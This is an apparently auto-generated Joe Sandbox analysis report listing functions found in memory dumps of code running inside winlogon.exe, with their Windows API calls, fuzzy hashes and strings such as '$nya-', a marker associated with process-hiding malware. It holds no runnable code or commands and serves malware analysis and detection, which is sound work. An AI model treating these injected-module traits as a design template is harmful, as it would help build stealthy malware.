Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: c05947797211d943349e5f043b86dc6255ec19a61c6acd9a3f94605f3853e510
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 87115E31320A80C6E7508B52E85875DBBA4FB88BE4F444236EE5E87B94CF3AC5048744

Function 000001E8589F3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001E8589F3431
GetLastError.KERNEL32 ref: 000001E8589F343D
CloseHandle.KERNEL32 ref: 000001E8589F3455
CreateFileW.KERNEL32 ref: 000001E8589F3480
WriteConsoleW.KERNEL32 ref: 000001E8589F349F

Strings

CONOUT$, xrefs: 000001E8589F3461

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: e72e18b605afdd5bcfa60b8c88aedce03ad5969cf3547dfeba78ac7931b4ad38
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: A2116D31334B80C6E7568B52E89479DB6A0FB88BE4F444236EE5E87BA4DF38C8048744

Function 000001E858993400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001E858993431
GetLastError.KERNEL32 ref: 000001E85899343D
CloseHandle.KERNEL32 ref: 000001E858993455
CreateFileW.KERNEL32 ref: 000001E858993480
WriteConsoleW.KERNEL32 ref: 000001E85899349F

Strings

CONOUT$, xrefs: 000001E858993461

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: 8c796445a0a8e8026d7b7265435b7dbda3745146acc9fcb33f3d7d1e27673c1e
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: B4115B31320A80C6E7608B52E85479EB7A5FB88FE4F444226EE5E87BA4DF39C8148740

Function 000001E8589B6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001E8589B62AB
GetThreadContext.KERNEL32 ref: 000001E8589B6415

Part of subcall function 000001E8589B60A0: GetCurrentThreadId.KERNEL32 ref: 000001E8589B60A4

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: a191e6a0ed449dbc1da06b4a6404c3c89197badc4939fb1cd1456c3767b6dfbf
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: 01D17776219BC8C6DA619B0AE49439EB7A0F7C8B89F500226EECD477A5DF3CC551CB04

Function 000001E8589B2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589B20A6
TlsFree.KERNEL32 ref: 000001E8589B225F
TlsFree.KERNEL32 ref: 000001E8589B226B
TlsFree.KERNEL32 ref: 000001E8589B2277
TlsFree.KERNEL32 ref: 000001E8589B2283
TlsFree.KERNEL32 ref: 000001E8589B228F

Part of subcall function 000001E8589B5E50: GetCurrentThreadId.KERNEL32 ref: 000001E8589B5E66

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 05430f933ca7a39d30ee09cab9032ffafbc013e3b8653f389b9e934b910f23b4
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: B151AD31226B85D9EB05AB68EC912DCF3A1FF0474AF840837AD2D063A6EF78D519C744

Function 000001E8589E2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589E20A6
TlsFree.KERNEL32 ref: 000001E8589E225F
TlsFree.KERNEL32 ref: 000001E8589E226B
TlsFree.KERNEL32 ref: 000001E8589E2277
TlsFree.KERNEL32 ref: 000001E8589E2283
TlsFree.KERNEL32 ref: 000001E8589E228F

Part of subcall function 000001E8589E5E50: GetCurrentThreadId.KERNEL32 ref: 000001E8589E5E66

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 13aa602f029e6cc9a32b07f007a4e989ca9e89a23b5a55c110bf162087638abd
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: A7519371221BC5D6EB06EB64EC912ECB7A1BF04748F840837AE2D067A5EF78D529C341

Function 000001E858982098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001E8589820A6
TlsFree.KERNEL32 ref: 000001E85898225F
TlsFree.KERNEL32 ref: 000001E85898226B
TlsFree.KERNEL32 ref: 000001E858982277
TlsFree.KERNEL32 ref: 000001E858982283
TlsFree.KERNEL32 ref: 000001E85898228F

Part of subcall function 000001E858985E50: GetCurrentThreadId.KERNEL32 ref: 000001E858985E66

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction ID: 99470b0f7017a8c61bb0c0787b1a05bb0bdfa3df255cc2376668a255bff162d9
Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
Instruction Fuzzy Hash: 6A518275221BC6D6EB05EB64ECA12DCB3A1BF04748F840937AD2D067A5EF78D519CB40

Function 000001E8589B35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589B24D1), ref: 000001E8589B35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001E8589B24D1), ref: 000001E8589B35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001E8589B24D1), ref: 000001E8589B3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589B24D1), ref: 000001E8589B36D9
HeapFree.KERNEL32(?,?,?,?,?,000001E8589B24D1), ref: 000001E8589B36E7

Strings

$nya-, xrefs: 000001E8589B366C

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: f7b3a5484bd7993fa959433514711ee3bc4ddd655ca7dcbf2dc5e8e85caf748a
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: DD317A32729B95CAEB10DF26E9453ADF7A0BF44B85F084032AE4C07B55EF34C8658700

Function 000001E8589E35C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589E24D1), ref: 000001E8589E35EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001E8589E24D1), ref: 000001E8589E35FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001E8589E24D1), ref: 000001E8589E3673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589E24D1), ref: 000001E8589E36D9
HeapFree.KERNEL32(?,?,?,?,?,000001E8589E24D1), ref: 000001E8589E36E7

Strings

$nya-, xrefs: 000001E8589E366C

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: 66de38e17f75016d2cfb8723aa9e1bc5d7c9f81ec31e093b1d0b86382275e46c
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 30314732721B95C3EB159F26E9816ADFBA0BF44B84F088432AE4C47B55EF34D4B18700

Function 000001E8589835C8 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589824D1), ref: 000001E8589835EB
HeapAlloc.KERNEL32(?,?,?,?,?,000001E8589824D1), ref: 000001E8589835FE
StrCmpNIW.SHLWAPI(?,?,?,?,?,000001E8589824D1), ref: 000001E858983673
GetProcessHeap.KERNEL32(?,?,?,?,?,000001E8589824D1), ref: 000001E8589836D9
HeapFree.KERNEL32(?,?,?,?,?,000001E8589824D1), ref: 000001E8589836E7

Strings

$nya-, xrefs: 000001E85898366C

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: $nya-
API String ID: 756756679-1266920357
Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction ID: fc654c6014bd52aef4d720a77ec2054f18dc03fd3c3b3d87c1ce58ef014babe4
Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
Instruction Fuzzy Hash: 6D316D32721B96C2EB61DF2AE9416ADF3A1BF54B84F084036AF4D07B55EF34C4618B00

Function 000001E8589F1FA8 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 304fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001E8589F2027
WriteFile.KERNEL32 ref: 000001E8589F2304
WriteFile.KERNEL32 ref: 000001E8589F234A
GetLastError.KERNEL32 ref: 000001E8589F2409

Strings

!-M, xrefs: 000001E8589F1FCD

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID: !-M
API String ID: 2718003287-3625753649
Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction ID: e1d4b231dd92484d0b0f185349a0891b1549448bbed80b83fd13b0c10210e358
Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
Instruction Fuzzy Hash: 5ED1DC32724A84CAE716CFA9D4403ECBBB1FB54B98F444226DE5EA7B99DE34C116C740

Function 000001E8589BC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001E8589BC94F
SetLastError.KERNEL32 ref: 000001E8589BC96E
FlsSetValue.KERNEL32 ref: 000001E8589BC997
FlsSetValue.KERNEL32 ref: 000001E8589BC9A8
FlsSetValue.KERNEL32 ref: 000001E8589BC9B9

Part of subcall function 000001E8589BD2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2B6
Part of subcall function 000001E8589BD2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589B674A), ref: 000001E8589BD2C0

SetLastError.KERNEL32 ref: 000001E8589BC9DC

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 8ed34a85f941ee1fb7607de18cba6ad79ac5c3f79eaf45c85416a8e1f2596f9e
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 49115E313392C0CAFA186771E8553EEB252AF85B96F944637AC6F567CACE2CC4018750

Function 000001E8589EC940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001E8589EC94F
SetLastError.KERNEL32 ref: 000001E8589EC96E
FlsSetValue.KERNEL32 ref: 000001E8589EC997
FlsSetValue.KERNEL32 ref: 000001E8589EC9A8
FlsSetValue.KERNEL32 ref: 000001E8589EC9B9

Part of subcall function 000001E8589ED2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2B6
Part of subcall function 000001E8589ED2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E8589E674A), ref: 000001E8589ED2C0

SetLastError.KERNEL32 ref: 000001E8589EC9DC

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: 2edc8f6c9fcb7790243b823b553f0d6562bee48b0a64f524eb4d00ed446016ff
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: 37112E353302C0C3FA596B31E8553EEBA52AF85794F544637ACAE5A3CADE3CD5214340

Function 000001E85898C940 Relevance: 9.1, APIs: 6, Instructions: 51COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 000001E85898C94F
SetLastError.KERNEL32 ref: 000001E85898C96E
FlsSetValue.KERNEL32 ref: 000001E85898C997
FlsSetValue.KERNEL32 ref: 000001E85898C9A8
FlsSetValue.KERNEL32 ref: 000001E85898C9B9

Part of subcall function 000001E85898D2A0: HeapFree.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2B6
Part of subcall function 000001E85898D2A0: GetLastError.KERNEL32(?,?,?,?,?,?,?,000001E85898674A), ref: 000001E85898D2C0

SetLastError.KERNEL32 ref: 000001E85898C9DC

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd

Similarity

API ID: ErrorLast$Value$FreeHeap
String ID:
API String ID: 365477584-0
Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction ID: d8c3559837e56566af46c0c28be9736a7e53cb542f7649a8cfd4671e6f67c343
Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
Instruction Fuzzy Hash: F3114C313302D2C2FA586731E8517EEB292AFC57A4F645637AC6F577CADE28C4018B40

Function 000001E8589B1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001E8589B1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589B1A74
PathFindFileNameW.SHLWAPI ref: 000001E8589B1A83
lstrlenW.KERNEL32 ref: 000001E8589B1A8F
StrCpyW.SHLWAPI ref: 000001E8589B1AA2
CloseHandle.KERNEL32 ref: 000001E8589B1AB0

Memory Dump Source

Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: d9c5abf8c6d7e949e863a241229034f7ab900d42a79fc14c2b598347979133df
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: D901D731724A84C6EB14DB12E85879EB7A1FB88FD1F8840369E9E83754DE39C985C790

Function 000001E8589E1A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001E8589E1A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001E8589E1A74
PathFindFileNameW.SHLWAPI ref: 000001E8589E1A83
lstrlenW.KERNEL32 ref: 000001E8589E1A8F
StrCpyW.SHLWAPI ref: 000001E8589E1AA2
CloseHandle.KERNEL32 ref: 000001E8589E1AB0

Memory Dump Source

Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true

Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction ID: 8fc7cceeacd61fb45096f4f24d697a589d209a49c552a0157010115bc04f8cbb
Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
Instruction Fuzzy Hash: 40011B31724A80C6EB24DB12E89879DB7A1FF88FC1F4940369E5E47754DE78C985C740

Function 000001E858981A30 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001E858981A56
K32GetModuleFileNameExW.KERNEL32 ref: 000001E858981A74
PathFindFileNameW.SHLWAPI ref: 000001E858981A83
lstrlenW.KERNEL32 ref: 000001E858981A8F
StrCpyW.SHLWAPI ref: 000001E858981AA2
CloseHandle.KERNEL32 ref: 000001E858981AB0

Memory Dump Source

Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true

Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
